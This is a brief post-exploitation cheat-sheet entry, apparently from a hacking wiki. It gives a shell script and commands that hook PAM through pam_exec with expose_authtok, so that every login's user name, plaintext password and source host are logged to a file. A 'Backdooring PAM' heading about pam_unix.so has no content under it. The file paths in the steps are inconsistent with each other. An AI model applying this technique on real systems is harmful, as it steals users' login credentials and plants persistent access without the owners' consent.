Linux Post-Exploitation
Sniffing Logon Passwords with PAM
PAM - Pluggable Authentication Modules#!/bin/sh
echo " $(date) $PAM_USER, $(cat -), From: $PAM_RHOST" >> /var/log/toomanysecrets.log
sudo touch /var/log/toomanysecrets.sh
sudo chmod 770 /var/log/toomanysecrets.sh
sudo nano /etc/pam.d/common-auth
# Add: auth optional pam_exec.so quiet expose_authtok /usr/local/bin/toomanysecrets.sh
sudo chmod 700 /usr/local/bin/toomanysecrets.shBackdooring PAM
Steps for Modifying pam_unix.so:
pam_unix.so:Last updated

